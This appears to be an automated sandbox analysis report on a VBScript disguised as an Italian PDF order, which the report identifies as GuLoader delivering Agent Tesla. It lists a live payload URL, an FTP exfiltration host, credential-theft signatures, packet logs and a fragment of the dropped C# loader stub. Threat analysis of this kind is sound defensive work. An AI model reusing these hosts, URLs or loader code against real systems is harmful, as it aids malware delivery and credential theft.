        /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 755275 Sample: Ordine n.47201 pdf.vbs Startdate: 28/11/2022 Architecture: WINDOWS Score: 100 40 Snort IDS alert for network traffic 2->40 42 Multi AV Scanner detection for domain / URL 2->42 44 Yara detected GuLoader 2->44 46 4 other signatures 2->46 8 wscript.exe 1 1 2->8         started        process3 signatures4 56 VBScript performs obfuscated calls to suspicious functions 8->56 58 Wscript starts Powershell (via cmd or directly) 8->58 60 Obfuscated command line found 8->60 62 Very long command line found 8->62 11 powershell.exe 20 8->11         started        15 cmd.exe 1 8->15         started        process5 file6 32 C:\Users\user\AppData\...\i3ontxzb.cmdline, Unicode 11->32 dropped 64 Tries to detect Any.run 11->64 17 CasPol.exe 15 12 11->17         started        21 csc.exe 3 11->21         started        24 conhost.exe 11->24         started        26 conhost.exe 15->26         started        signatures7 process8 dnsIp9 34 ftp.mcmprint.net 185.31.121.136, 21, 49725, 49726 RAX-ASBG Bulgaria 17->34 36 qwedft.gq 162.240.62.179, 49722, 80 UNIFIEDLAYER-AS-1US United States 17->36 38 2 other IPs or domains 17->38 48 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->48 50 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->50 52 May check the online IP address of the machine 17->52 54 5 other signatures 17->54 30 C:\Users\user\AppData\Local\...\i3ontxzb.dll, PE32 21->30 dropped 28 cvtres.exe 1 21->28         started        file10 signatures11 process12

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        Ordine n.47201 pdf.vbs0%ReversingLabs
        Ordine n.47201 pdf.vbs0%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        api.ipify.org.herokudns.com0%VirustotalBrowse
        ftp.mcmprint.net10%VirustotalBrowse
        SourceDetectionScannerLabelLink
        http://qwedft.gq/Akkant/bwqPIdZhEA125.psm0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        api.ipify.org.herokudns.com
        52.20.78.240
        truefalseunknown
        qwedft.gq
        162.240.62.179
        truefalse
          unknown
          ftp.mcmprint.net
          185.31.121.136
          truetrueunknown
          api.ipify.org
          unknown
          unknownfalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://api.ipify.org/false
              high
              http://qwedft.gq/Akkant/bwqPIdZhEA125.psmfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              162.240.62.179
              qwedft.gqUnited States
              46606UNIFIEDLAYER-AS-1USfalse
              52.20.78.240
              api.ipify.org.herokudns.comUnited States
              14618AMAZON-AESUSfalse
              185.31.121.136
              ftp.mcmprint.netBulgaria
              199364RAX-ASBGtrue
              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:755275
              Start date and time:2022-11-28 14:49:15 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 11m 52s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:Ordine n.47201 pdf.vbs
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:20
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.spyw.expl.evad.winVBS@13/10@3/3
              EGA Information:
              • Successful, ratio: 50%
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .vbs
              • Override analysis time to 240s for JS files taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
              • TCP Packets have been reduced to 100
              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, login.live.com, ctldl.windowsupdate.com
              • Execution Graph export aborted for target powershell.exe, PID 5864 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              14:51:11API Interceptor26x Sleep call for process: powershell.exe modified
              14:53:16API Interceptor510x Sleep call for process: CasPol.exe modified
              No context
              No context
              No context
              No context
              No context
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:modified
              Size (bytes):8003
              Entropy (8bit):4.839308921501875
              Encrypted:false
              SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
              MD5:937C6E940577634844311E349BD4614D
              SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
              SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
              SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
              Malicious:false
              Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Mon Nov 28 22:51:21 2022, 1st section name ".debug$S"
              Category:modified
              Size (bytes):1332
              Entropy (8bit):3.993205850947984
              Encrypted:false
              SSDEEP:24:HIhzW9/YvcvzZHlYhKPfII+ycuZhNuwakS51PNnq92d:dnzZUKPg1uluwa35vq9G
              MD5:5216863F480F7882AFAEB89499228D62
              SHA1:2FB2EE5648BD1299BB19C290959389D28E949E64
              SHA-256:E72C9C28195AEE60FF6D5C4A7A7BAC75E2BCDE090DB1809D056A4593BE620267
              SHA-512:E10835EA13C09419A91B594414851DE24475C52351F2F332AB4F712E9E3888D141E90C28AEE3D86561AC8CDCA62732275DA225A3DCA92EAF739A5A63BD419AED
              Malicious:false
              Preview:L...i;.c.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........V....c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP..................3.vX\pf5.D.W%.4..........7.......C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp.-.<...................'...Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.3.o.n.t.x.z.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview:1
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview:1
              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.097050408210201
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryduwak7Ynqq2u1PN5Dlq5J:+RI+ycuZhNuwakS51PNnqX
              MD5:DA33A376585C706635F644DB5725B434
              SHA1:272B23AC808ED82681252C631879A4DCD6EEE31F
              SHA-256:2575D68B16ABBC5375AA45E18277CE15325F90F1169E3426B8DB3EBDD8723C4A
              SHA-512:9AB011BF6BF4CD87C7BDF2017DCE89F539DB31C9F8923B10607B21BE4F9FB6713904D49905D4E524B4A8A139838D6E5F81B8621EB886BB79FFAF9004A3B15780
              Malicious:false
              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.3.o.n.t.x.z.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.3.o.n.t.x.z.b...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1160), with no line terminators
              Category:dropped
              Size (bytes):1163
              Entropy (8bit):4.896337045995905
              Encrypted:false
              SSDEEP:24:JVSkaft8Qnl+BtwLzZTfgK9ZJqCNBFToLFxYBZ+dU6C5MnH:JVhafSQl+QRToK9ZJJNBFUBSZ+dUr5MH
              MD5:54C8D9DE5C308B3B41EFB88461C28598
              SHA1:555180A90D78546DF302FFB4C53F4E4290380D96
              SHA-256:E4E7463629553F5D62C18DD2FAB65BE93EBDF404C5663C189EE07FB6D4AC7C75
              SHA-512:206D0F4A95FB8D038DDD773E39F5D57AF3F603895A23E2E7D36DFC782DF8B9C4B9ED4508F4DF6CF28566967C902031E35807F28C512D7AB652355A3312E60DD1
              Malicious:false
              Preview:.using System;using System.Runtime.InteropServices;public static class Stueorglers1 {[DllImport("winspool.drv")]public static extern int PrinterMessageBox(int Stabl,int delagt,int Cro,int Rivul,int Tropic,int Skitse);[DllImport("ADVAPI32.DLL")]public static extern int RegQueryInfoKey(int Potten,int Teleol,int Plur,int Fusion,int sal,int Sau,int kalk,int Wee,int Godk,int Synan,int Pea,int Birk);[DllImport("kernel32")]public static extern int DuplicateHandle(int Hje,int Meetin,int Unor,int exac,int Over,int Biomec,int Silu);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImport("user32")]public static extern int GetProp(int Egy,int Sha);[DllImport("user32")]public static extern int CreateCursor(int Mell,int Rrl,int Flyg,int fastl,int Baan111,int Pseu,int Quaker);[DllImport("advapi32")]public static extern int SetServiceBits(int Gar,int Tenon,int Desp,int Explat);[DllImport("gdi32")]public static extern int GetClipRgn(int Rula,int Likv104);[
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (374), with no line terminators
              Category:dropped
              Size (bytes):377
              Entropy (8bit):5.224013965503116
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fzEQUzxs7+AEszIcNwi23fzEQmA:p37Lvkmb6KwZYQUWZEJZYQR
              MD5:C0FA1452EA401B9C3DD58DFBF90FF905
              SHA1:E7176041207188F5EC74B233BFBAA95B62B5A62D
              SHA-256:BA134CBB89F5E901CADCFDBE2D741891736B9C52E09DB2751D7CB755C0141E91
              SHA-512:BA1CB0B87C7F5822AA3C760667924A6E44F6262F51D75AA350AA065FD0552B277AC37B1750742AD2E0FC7D4A7A9F32C5A8CFF693DD2254330D9A5D439FAB8591
              Malicious:true
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.0.cs"
              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):4096
              Entropy (8bit):3.2841703403897786
              Encrypted:false
              SSDEEP:48:6MkG51Mp2p9iSk+A6s9hvS3C6OFTre1uluwa35vq:KG51njiSk+N3MZwwK5
              MD5:472A0CEAFAC864C213CE8B1A44A72F2D
              SHA1:9A6DCCDD9D6806F11AB079E1CC65DF964D4DC19A
              SHA-256:8EAF0C298EEAC82C604082157141D067E96B6C6B0B5E895BF5D15AF9959EA385
              SHA-512:B1142E011A380227B8019B22637F04A436138C7473DF91549469B6DFB2E33AD2B3AD685159FDF960C42F659E8D0567F88DDA6DB6AFE65CD72203F595FB82EDBC
              Malicious:false
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i;.c...........!.................'... ...@....... ....................................@..................................&..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......P ..h...........................................................BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID.......|...#Blob...........G.........%3....................0.......................................4.-...............G.(.................................... ;............ M............ ].$.......... m./.......... z.7.......... ..$. ........ ../.'........ ..7.+........ ..7.-........ ..=./...............................
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
              Category:modified
              Size (bytes):872
              Entropy (8bit):5.312266178218381
              Encrypted:false
              SSDEEP:24:Aqd3ka6KgYKEvYVKaM5DqBVKVrdFAMBJTH:Aika67rEvWKxDcVKdBJj
              MD5:0F0859B8EE75C7F44B97667B8E67740B
              SHA1:68F2664181B267168FEDD8751AA7B84BD5B27E95
              SHA-256:A8295C9CCD4AC423E50F826A4689A3EE33179A17A856ABABAA54865A8F9638F6
              SHA-512:974CC9FF0A68542A23DA398F3C172028AC7E9721D8765696FBB4E6DD59D57CA5A0FCA44E1B8EED645BFAC3BE9628D3B03F1A6B93E2D37462D72C7326CB493710
              Malicious:false
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):30
              Entropy (8bit):3.964735178725505
              Encrypted:false
              SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
              MD5:9F754B47B351EF0FC32527B541420595
              SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
              SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
              SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
              Malicious:false
              Preview:NordVPN directory not found!..
              File type:ASCII text, with CRLF line terminators
              Entropy (8bit):5.8757896066938615
              TrID:
                File name:Ordine n.47201 pdf.vbs
                File size:345196
                MD5:c8290bc8659c4a6a45ccd1af9268e400
                SHA1:d2a97dd4fa44d5e2a568d75b764cc47e5878f960
                SHA256:f39968efba7ebe58abba685f5b834f6e0c8393dfaeaf7d08d5f6e625c33a04e1
                SHA512:52cf38b8095759f33affba504463f1d8b44d2497efa1bb21e84e63d75d52a61e45b3327a01d5c0fd54116091273d429066603e2e50dfc9303bddf54f9896f6c5
                SSDEEP:6144:JgYNxYywvF7r/8o1W1iajiYGnCEMDKlM58vbu7bhHZIKK:iVvF7r07iYGCEMejc6KK
                TLSH:5D749E50EFD9191D0D4B3A7A9C831B48F93DCE2611F6F4E96DA8138D3B02658C66F239
                File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl
                Icon Hash:e8d69ece869a9ec4
                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                192.168.2.7185.31.121.13649726613132851779 11/28/22-14:53:16.335427TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4972661313192.168.2.7185.31.121.136
                192.168.2.7185.31.121.13649725212029927 11/28/22-14:53:16.290035TCP2029927ET TROJAN AgentTesla Exfil via FTP4972521192.168.2.7185.31.121.136
                TimestampSource PortDest PortSource IPDest IP
                Nov 28, 2022 14:52:53.434041023 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.602250099 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.602458000 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.606096983 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.773952961 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.774775028 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.774816036 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.774847031 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.774892092 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.774915934 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.774915934 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.774936914 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.774951935 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.774952888 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.774981022 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.775005102 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.775038958 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.775060892 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.775075912 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.775108099 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.775119066 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.775152922 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.943191051 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943248987 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943280935 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943325996 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943351030 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943372011 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.943392038 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943398952 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.943409920 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943419933 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.943428040 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943444967 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943460941 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.943463087 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943480968 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943485022 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.943499088 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943511009 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.943516016 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943532944 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943542957 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.943551064 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943568945 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943586111 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943587065 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.943603992 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943617105 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.943623066 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943633080 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.943640947 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:53.943664074 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:53.943691015 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:54.111486912 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111556053 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111603975 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111648083 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111684084 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111701965 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111718893 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111737967 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111756086 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111773968 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111792088 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111809969 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111807108 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:54.111828089 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111846924 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111865044 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111882925 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111901045 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111918926 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111936092 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111953974 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111954927 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:54.111970901 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.111989021 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112005949 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112023115 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112040997 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112054110 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:54.112059116 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112076998 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112095118 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112114906 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112133980 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112137079 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:54.112150908 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112169027 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112186909 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112204075 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112221003 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:54.112221956 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112241030 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112257957 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112276077 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112293959 CET8049722162.240.62.179192.168.2.7
                Nov 28, 2022 14:52:54.112299919 CET4972280192.168.2.7162.240.62.179
                Nov 28, 2022 14:52:54.112310886 CET8049722162.240.62.179192.168.2.7
                TimestampSource PortDest PortSource IPDest IP
                Nov 28, 2022 14:52:53.073584080 CET5002453192.168.2.78.8.8.8
                Nov 28, 2022 14:52:53.413013935 CET53500248.8.8.8192.168.2.7
                Nov 28, 2022 14:53:00.452600956 CET4951653192.168.2.78.8.8.8
                Nov 28, 2022 14:53:00.471657038 CET53495168.8.8.8192.168.2.7
                Nov 28, 2022 14:53:15.682427883 CET6139253192.168.2.78.8.8.8
                Nov 28, 2022 14:53:15.843619108 CET53613928.8.8.8192.168.2.7
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Nov 28, 2022 14:52:53.073584080 CET192.168.2.78.8.8.80xcbd2Standard query (0)qwedft.gqA (IP address)IN (0x0001)false
                Nov 28, 2022 14:53:00.452600956 CET192.168.2.78.8.8.80x1219Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                Nov 28, 2022 14:53:15.682427883 CET192.168.2.78.8.8.80xc173Standard query (0)ftp.mcmprint.netA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Nov 28, 2022 14:52:53.413013935 CET8.8.8.8192.168.2.70xcbd2No error (0)qwedft.gq162.240.62.179A (IP address)IN (0x0001)false
